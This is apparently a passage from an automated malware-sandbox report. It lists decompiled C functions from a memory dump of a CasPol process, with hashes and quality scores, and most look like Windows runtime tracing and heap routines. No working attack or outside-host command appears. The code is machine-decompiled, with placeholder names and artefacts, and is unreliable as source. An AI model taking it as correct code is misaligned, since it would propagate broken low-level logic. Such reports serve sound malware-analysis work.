                                                                				short _v58;
                                                                				char _v64;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed char* _t18;
                                                                				intOrPtr _t24;
                                                                				intOrPtr _t30;
                                                                				intOrPtr _t31;
                                                                				signed int _t32;
                                                                
                                                                				_t29 = __edx;
                                                                				_t24 = __ebx;
                                                                				_v12 =  *0x171d360 ^ _t32;
                                                                				_t30 = __edx;
                                                                				_t31 = __ecx;
                                                                				E0166FA60( &_v64, 0, 0x30);
                                                                				_v24 = _a4;
                                                                				_v32 = _t31;
                                                                				_v28 = _t30;
                                                                				_v58 = 0x266;
                                                                				if(E01647D50() == 0) {
                                                                					_t18 = 0x7ffe0388;
                                                                				} else {
                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                				}
                                                                				_push( &_v64);
                                                                				_push(0x10);
                                                                				_push(0x20402);
                                                                				_push( *_t18 & 0x000000ff);
                                                                				return E0166B640(E01669AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                                			}

















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dee6a9e917b30b54fccab906be80656e15735f67195189e6737d86ad977c8da9
                                                                • Instruction ID: a2294658573c55224affcf5b692faf240aa30af4218519a5a77be4454e04df10
                                                                • Opcode Fuzzy Hash: dee6a9e917b30b54fccab906be80656e15735f67195189e6737d86ad977c8da9
                                                                • Instruction Fuzzy Hash: 2A018471E00219AFDB14DFA9DC45FAEBBB8EF54710F0040AAB901EB380DA709A01C798
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 54%
                                                                			E016F8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                				signed int _v12;
                                                                				intOrPtr _v24;
                                                                				intOrPtr _v28;
                                                                				intOrPtr _v32;
                                                                				intOrPtr _v36;
                                                                				intOrPtr _v40;
                                                                				short _v66;
                                                                				char _v72;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed char* _t18;
                                                                				signed int _t32;
                                                                
                                                                				_t29 = __edx;
                                                                				_v12 =  *0x171d360 ^ _t32;
                                                                				_t31 = _a8;
                                                                				_t30 = _a12;
                                                                				_v66 = 0x1c20;
                                                                				_v40 = __ecx;
                                                                				_v36 = __edx;
                                                                				_v32 = _a4;
                                                                				_v28 = _a8;
                                                                				_v24 = _a12;
                                                                				if(E01647D50() == 0) {
                                                                					_t18 = 0x7ffe0386;
                                                                				} else {
                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                				}
                                                                				_push( &_v72);
                                                                				_push(0x14);
                                                                				_push(0x20402);
                                                                				_push( *_t18 & 0x000000ff);
                                                                				return E0166B640(E01669AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                                                			}

















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d64a11d9112ecadada9cded9e7d34b9842e7dcb6f2e09c17b6eaa3f3f3ae472
                                                                • Instruction ID: ecbb346f2d94982b612bf8d2e11bcd436291fb48f482cafe31da0a41c3a837de
                                                                • Opcode Fuzzy Hash: 8d64a11d9112ecadada9cded9e7d34b9842e7dcb6f2e09c17b6eaa3f3f3ae472
                                                                • Instruction Fuzzy Hash: 0C01EC71A0121DAFDB04DFA9D9459AEBBB8EF58710F10405AFA05E7351DB34AA01CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 54%
                                                                			E016F8ED6(intOrPtr __ecx, intOrPtr __edx) {
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				intOrPtr _v16;
                                                                				intOrPtr _v20;
                                                                				intOrPtr _v24;
                                                                				intOrPtr _v28;
                                                                				intOrPtr _v32;
                                                                				intOrPtr _v36;
                                                                				short _v62;
                                                                				char _v68;
                                                                				signed char* _t29;
                                                                				intOrPtr _t35;
                                                                				intOrPtr _t41;
                                                                				intOrPtr _t42;
                                                                				signed int _t43;
                                                                
                                                                				_t40 = __edx;
                                                                				_v8 =  *0x171d360 ^ _t43;
                                                                				_v28 = __ecx;
                                                                				_v62 = 0x1c2a;
                                                                				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                                                				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                                                				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                                                				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                                                				_v24 = __edx;
                                                                				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                                                				if(E01647D50() == 0) {
                                                                					_t29 = 0x7ffe0386;
                                                                				} else {
                                                                					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                				}
                                                                				_push( &_v68);
                                                                				_push(0x1c);
                                                                				_push(0x20402);
                                                                				_push( *_t29 & 0x000000ff);
                                                                				return E0166B640(E01669AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                                                			}



















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5a5e02e44c695b99a47f65eead4f3f7ca610f4260771faecbc4106c806cbe69e
                                                                • Instruction ID: b4c206baf454780b628caa88116786a0987aa0f76a533f66defef0b295f1ea86
                                                                • Opcode Fuzzy Hash: 5a5e02e44c695b99a47f65eead4f3f7ca610f4260771faecbc4106c806cbe69e
                                                                • Instruction Fuzzy Hash: 86111E71A01259DFDB04DFA8D941BAEFBF4FF08300F0442AAE918EB381E6349940CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0162DB60(signed int __ecx) {
                                                                				intOrPtr* _t9;
                                                                				void* _t12;
                                                                				void* _t13;
                                                                				intOrPtr _t14;
                                                                
                                                                				_t9 = __ecx;
                                                                				_t14 = 0;
                                                                				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                                                					_t13 = 0xc000000d;
                                                                				} else {
                                                                					_t14 = E0162DB40();
                                                                					if(_t14 == 0) {
                                                                						_t13 = 0xc0000017;
                                                                					} else {
                                                                						_t13 = E0162E7B0(__ecx, _t12, _t14, 0xfff);
                                                                						if(_t13 < 0) {
                                                                							L0162E8B0(__ecx, _t14, 0xfff);
                                                                							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                                                							_t14 = 0;
                                                                						} else {
                                                                							_t13 = 0;
                                                                							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                                                						}
                                                                					}
                                                                				}
                                                                				 *_t9 = _t14;
                                                                				return _t13;
                                                                			}








                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                • Instruction ID: 6d988b2128fd279b2484779c83eb9744e6ad2606c79f9ae8a43ca60157f2c534
                                                                • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                • Instruction Fuzzy Hash: 5BF0FC73605D339BD3326AD94CA0F67BA969FE2A61F160039F2059B344CF608C028ED5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0162B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                                                				signed char* _t13;
                                                                				intOrPtr _t22;
                                                                				char _t23;
                                                                
                                                                				_t23 = __edx;
                                                                				_t22 = __ecx;
                                                                				if(E01647D50() != 0) {
                                                                					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                				} else {
                                                                					_t13 = 0x7ffe0384;
                                                                				}
                                                                				if( *_t13 != 0) {
                                                                					_t13 =  *[fs:0x30];
                                                                					if((_t13[0x240] & 0x00000004) == 0) {
                                                                						goto L3;
                                                                					}
                                                                					if(E01647D50() == 0) {
                                                                						_t13 = 0x7ffe0385;
                                                                					} else {
                                                                						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                					}
                                                                					if(( *_t13 & 0x00000020) == 0) {
                                                                						goto L3;
                                                                					}
                                                                					return E016A7016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                                                				} else {
                                                                					L3:
                                                                					return _t13;
                                                                				}
                                                                			}







                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                • Instruction ID: cc80c5463c5690174be015367accfd37e51d36f2fab67400222573683d54ecee
                                                                • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                • Instruction Fuzzy Hash: A501F433201A91DBD322A75DCC04F69BB99EF52754F0944A1FE148B7B2DB79C800C728
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 46%
                                                                			E016BFE87(intOrPtr __ecx) {
                                                                				signed int _v8;
                                                                				intOrPtr _v16;
                                                                				intOrPtr _v20;
                                                                				signed int _v24;
                                                                				intOrPtr _v28;
                                                                				short _v54;
                                                                				char _v60;
                                                                				signed char* _t21;
                                                                				intOrPtr _t27;
                                                                				intOrPtr _t32;
                                                                				intOrPtr _t33;
                                                                				intOrPtr _t34;
                                                                				signed int _t35;
                                                                
                                                                				_v8 =  *0x171d360 ^ _t35;
                                                                				_v16 = __ecx;
                                                                				_v54 = 0x1722;
                                                                				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                                                				_v28 =  *((intOrPtr*)(__ecx + 4));
                                                                				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                                                				if(E01647D50() == 0) {
                                                                					_t21 = 0x7ffe0382;
                                                                				} else {
                                                                					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                                                				}
                                                                				_push( &_v60);
                                                                				_push(0x10);
                                                                				_push(0x20402);
                                                                				_push( *_t21 & 0x000000ff);
                                                                				return E0166B640(E01669AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                			}

















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f95ea5d96e29aa19fe9dfc0a9a2631ced68d783656201a050ca9eff0e5a6114
                                                                • Instruction ID: 16150cc2d9b29967e26f0f8a50d11db14b2030695ce62f77ea8ba4aecfeef89e
                                                                • Opcode Fuzzy Hash: 3f95ea5d96e29aa19fe9dfc0a9a2631ced68d783656201a050ca9eff0e5a6114
                                                                • Instruction Fuzzy Hash: 9A018671A0020DEFCB14DFA8D945A6EB7F4FF14704F104199B904DB392DA35DA02CB44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 48%
                                                                			E016E131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                				signed int _v8;
                                                                				intOrPtr _v12;
                                                                				intOrPtr _v16;
                                                                				intOrPtr _v20;
                                                                				intOrPtr _v24;
                                                                				short _v50;
                                                                				char _v56;
                                                                				signed char* _t18;
                                                                				intOrPtr _t24;
                                                                				intOrPtr _t30;
                                                                				intOrPtr _t31;
                                                                				signed int _t32;
                                                                
                                                                				_t29 = __edx;
                                                                				_v8 =  *0x171d360 ^ _t32;
                                                                				_v20 = _a4;
                                                                				_v12 = _a8;
                                                                				_v24 = __ecx;
                                                                				_v16 = __edx;
                                                                				_v50 = 0x1021;
                                                                				if(E01647D50() == 0) {
                                                                					_t18 = 0x7ffe0380;
                                                                				} else {
                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                				}
                                                                				_push( &_v56);
                                                                				_push(0x10);
                                                                				_push(0x20402);
                                                                				_push( *_t18 & 0x000000ff);
                                                                				return E0166B640(E01669AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                                			}
















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 21bbf94f85b79fd17a30365da03e0a945a638b384c5b8f1ab1b7a3f1c6e2f532
                                                                • Instruction ID: e3f054596c88adf1a0181552380124ae57eb909f9317b1e0e1c4344c00054e08
                                                                • Opcode Fuzzy Hash: 21bbf94f85b79fd17a30365da03e0a945a638b384c5b8f1ab1b7a3f1c6e2f532
                                                                • Instruction Fuzzy Hash: 30013C71A0125DAFCB04EFA9D949AAEB7F4FF18700F108059BD45EB381EA349A00DB54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 48%
                                                                			E016F8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                				signed int _v8;
                                                                				intOrPtr _v12;
                                                                				intOrPtr _v16;
                                                                				intOrPtr _v20;
                                                                				intOrPtr _v24;
                                                                				short _v50;
                                                                				char _v56;
                                                                				signed char* _t18;
                                                                				intOrPtr _t24;
                                                                				intOrPtr _t30;
                                                                				intOrPtr _t31;
                                                                				signed int _t32;
                                                                
                                                                				_t29 = __edx;
                                                                				_v8 =  *0x171d360 ^ _t32;
                                                                				_v16 = __ecx;
                                                                				_v50 = 0x1c2c;
                                                                				_v24 = _a4;
                                                                				_v20 = _a8;
                                                                				_v12 = __edx;
                                                                				if(E01647D50() == 0) {
                                                                					_t18 = 0x7ffe0386;
                                                                				} else {
                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                				}
                                                                				_push( &_v56);
                                                                				_push(0x10);
                                                                				_push(0x402);
                                                                				_push( *_t18 & 0x000000ff);
                                                                				return E0166B640(E01669AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                                			}
















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4ecb2e50ef795cf749ef74cfce95f23799f6a8b3f82ad4034fe2890cdc18cc3e
                                                                • Instruction ID: 9c9b1a18f407e754aa043f360ac58019b5bf050e5ae26e981b26a49b6dc59044
                                                                • Opcode Fuzzy Hash: 4ecb2e50ef795cf749ef74cfce95f23799f6a8b3f82ad4034fe2890cdc18cc3e
                                                                • Instruction Fuzzy Hash: CB014475A0120DEFDB00DFA8D945AAEB7F9EF18300F108459B905EB381DB34DA00CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 46%
                                                                			E016E1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                				signed int _v8;
                                                                				intOrPtr _v12;
                                                                				intOrPtr _v16;
                                                                				intOrPtr _v20;
                                                                				short _v46;
                                                                				char _v52;
                                                                				signed char* _t15;
                                                                				intOrPtr _t21;
                                                                				intOrPtr _t27;
                                                                				intOrPtr _t28;
                                                                				signed int _t29;
                                                                
                                                                				_t26 = __edx;
                                                                				_v8 =  *0x171d360 ^ _t29;
                                                                				_v12 = _a4;
                                                                				_v20 = __ecx;
                                                                				_v16 = __edx;
                                                                				_v46 = 0x1024;
                                                                				if(E01647D50() == 0) {
                                                                					_t15 = 0x7ffe0380;
                                                                				} else {
                                                                					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                				}
                                                                				_push( &_v52);
                                                                				_push(0xc);
                                                                				_push(0x20402);
                                                                				_push( *_t15 & 0x000000ff);
                                                                				return E0166B640(E01669AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                                                			}















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d6dccae943e7fc40b428f8728a8492ce710dd4df27df58209b0bc85f9f6ddcee
                                                                • Instruction ID: d9db45dcd27b84a228909e588f8154a7164df9389abcbe452a0d1ec4d41b1566
                                                                • Opcode Fuzzy Hash: d6dccae943e7fc40b428f8728a8492ce710dd4df27df58209b0bc85f9f6ddcee
                                                                • Instruction Fuzzy Hash: A7F06271A01258EFDB14DFE8D815A6EB7F8FF14300F044159A905EB381EA349900CB54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0164C577(void* __ecx, char _a4) {
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				void* _t17;
                                                                				void* _t19;
                                                                				void* _t20;
                                                                				void* _t21;
                                                                
                                                                				_t18 = __ecx;
                                                                				_t21 = __ecx;
                                                                				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0164C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x16011cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                					__eflags = _a4;
                                                                					if(__eflags != 0) {
                                                                						L10:
                                                                						E016F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                                						L9:
                                                                						return 0;
                                                                					}
                                                                					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                					if(__eflags == 0) {
                                                                						goto L10;
                                                                					}
                                                                					goto L9;
                                                                				} else {
                                                                					return 1;
                                                                				}
                                                                			}










                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 007c02d7eb93377054d2b8012de3979a4f9ca2fd71a1fbce1ac6346a1b0fc311
                                                                • Instruction ID: eec87b95991a5b0e11993340e87dc7b2a7181f11e8dcd452cb89df040c8cd627
                                                                • Opcode Fuzzy Hash: 007c02d7eb93377054d2b8012de3979a4f9ca2fd71a1fbce1ac6346a1b0fc311
                                                                • Instruction Fuzzy Hash: CCF0E9B29176909FE73EC71CCC04B2A7FD89B05770F4584ABD51587342D7A4D8A0C2D4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 94%
                                                                			E016E2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                                				void* __esi;
                                                                				signed char _t3;
                                                                				signed char _t7;
                                                                				void* _t19;
                                                                
                                                                				_t17 = __ecx;
                                                                				_t3 = E016DFD22(__ecx);
                                                                				_t19 =  *0x171849c - _t3; // 0x0
                                                                				if(_t19 == 0) {
                                                                					__eflags = _t17 -  *0x1718748; // 0x0
                                                                					if(__eflags <= 0) {
                                                                						E016E1C06();
                                                                						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                                                						__eflags = _t3;
                                                                						if(_t3 != 0) {
                                                                							L5:
                                                                							__eflags =  *0x1718724 & 0x00000004;
                                                                							if(( *0x1718724 & 0x00000004) == 0) {
                                                                								asm("int3");
                                                                								return _t3;
                                                                							}
                                                                						} else {
                                                                							_t3 =  *0x7ffe02d4 & 0x00000003;
                                                                							__eflags = _t3 - 3;
                                                                							if(_t3 == 3) {
                                                                								goto L5;
                                                                							}
                                                                						}
                                                                					}
                                                                					return _t3;
                                                                				} else {
                                                                					_t7 =  *0x1718724; // 0x0
                                                                					return E016D8DF1(__ebx, 0xc0000374, 0x1715890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                                                				}
                                                                			}








                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 98e49969888d86969331e64b7ae314cb32f1408bceb5cce4cdb85ec89cff2671
                                                                • Instruction ID: 09949e99e175a342a0e3e8ec738a601382dbd1801c84bf7b5eaca82cfa333059
                                                                • Opcode Fuzzy Hash: 98e49969888d86969331e64b7ae314cb32f1408bceb5cce4cdb85ec89cff2671
                                                                • Instruction Fuzzy Hash: 04F0207B8171854BDF326B2C28292E12FEBD796120B09418DD8A017389CA388893CF29
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 54%
                                                                			E0166927A(void* __ecx) {
                                                                				signed int _t11;
                                                                				void* _t14;
                                                                
                                                                				_t11 = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                                                				if(_t11 != 0) {
                                                                					E0166FA60(_t11, 0, 0x98);
                                                                					asm("movsd");
                                                                					asm("movsd");
                                                                					asm("movsd");
                                                                					asm("movsd");
                                                                					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                                                					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                                                					E016692C6(_t11, _t14);
                                                                				}
                                                                				return _t11;
                                                                			}






                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                • Instruction ID: 6d92a4b4fe2edc1a4d9717746625a283c2da6b5c73eb6a12b4ce4b285ce1cb37
                                                                • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                • Instruction Fuzzy Hash: 83E02232340601ABE721AE0ADCC0F5737AEEF92724F00807CB9001E282CAF6DC0887A4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 43%
                                                                			E016F8D34(intOrPtr __ecx, intOrPtr __edx) {
                                                                				signed int _v8;
                                                                				intOrPtr _v12;
                                                                				intOrPtr _v16;
                                                                				short _v42;
                                                                				char _v48;
                                                                				signed char* _t12;
                                                                				intOrPtr _t18;
                                                                				intOrPtr _t24;
                                                                				intOrPtr _t25;
                                                                				signed int _t26;
                                                                
                                                                				_t23 = __edx;
                                                                				_v8 =  *0x171d360 ^ _t26;
                                                                				_v16 = __ecx;
                                                                				_v42 = 0x1c2b;
                                                                				_v12 = __edx;
                                                                				if(E01647D50() == 0) {
                                                                					_t12 = 0x7ffe0386;
                                                                				} else {
                                                                					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                				}
                                                                				_push( &_v48);
                                                                				_push(8);
                                                                				_push(0x20402);
                                                                				_push( *_t12 & 0x000000ff);
                                                                				return E0166B640(E01669AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                                                			}














                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 898727ed40c0435d26db27b143137c1510555a4096e462eb05509c9a975cd8af
                                                                • Instruction ID: 1da06467a0a10841cb2690a7e665ab79fe9e2f61eeaeed535a15064a60f20900
                                                                • Opcode Fuzzy Hash: 898727ed40c0435d26db27b143137c1510555a4096e462eb05509c9a975cd8af
                                                                • Instruction Fuzzy Hash: 6AF0B471A046089FDB14EFB8D845A6EB7B8EF14300F10809DE905EB380DA34D900CB54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 36%
                                                                			E016F8B58(intOrPtr __ecx) {
                                                                				signed int _v8;
                                                                				intOrPtr _v20;
                                                                				short _v46;
                                                                				char _v52;
                                                                				signed char* _t11;
                                                                				intOrPtr _t17;
                                                                				intOrPtr _t22;
                                                                				intOrPtr _t23;
                                                                				intOrPtr _t24;
                                                                				signed int _t25;
                                                                
                                                                				_v8 =  *0x171d360 ^ _t25;
                                                                				_v20 = __ecx;
                                                                				_v46 = 0x1c26;
                                                                				if(E01647D50() == 0) {
                                                                					_t11 = 0x7ffe0386;
                                                                				} else {
                                                                					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                				}
                                                                				_push( &_v52);
                                                                				_push(4);
                                                                				_push(0x402);
                                                                				_push( *_t11 & 0x000000ff);
                                                                				return E0166B640(E01669AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                                			}














                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 80608c0f48cdf22f1f78df6636ade37e59578234115a8aa5b048ee406fed555f
                                                                • Instruction ID: add96e6a4250ca9da2b98666e5d3d3b743c8591dfab3b3962ab2c7ec3a7612cc
                                                                • Opcode Fuzzy Hash: 80608c0f48cdf22f1f78df6636ade37e59578234115a8aa5b048ee406fed555f
                                                                • Instruction Fuzzy Hash: 4CF082B1A1425DAFDB10EBA8DD06E6EB7B8EF14300F04049DBA05DB380EB34D900C798
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 88%
                                                                			E0164746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                                                				signed int _t8;
                                                                				void* _t10;
                                                                				short* _t17;
                                                                				void* _t19;
                                                                				intOrPtr _t20;
                                                                				void* _t21;
                                                                
                                                                				_t20 = __esi;
                                                                				_t19 = __edi;
                                                                				_t17 = __ebx;
                                                                				if( *((char*)(_t21 - 0x25)) != 0) {
                                                                					if(__ecx == 0) {
                                                                						E0163EB70(__ecx, 0x17179a0);
                                                                					} else {
                                                                						asm("lock xadd [ecx], eax");
                                                                						if((_t8 | 0xffffffff) == 0) {
                                                                							_push( *((intOrPtr*)(__ecx + 4)));
                                                                							E016695D0();
                                                                							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                                                							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                                                							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                                                						}
                                                                					}
                                                                					L10:
                                                                				}
                                                                				_t10 = _t19 + _t19;
                                                                				if(_t20 >= _t10) {
                                                                					if(_t19 != 0) {
                                                                						 *_t17 = 0;
                                                                						return 0;
                                                                					}
                                                                				}
                                                                				return _t10;
                                                                				goto L10;
                                                                			}










                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7df576a58911947865fcfcac9e5117c38b9f942dc914450680fa4942f2d3b061
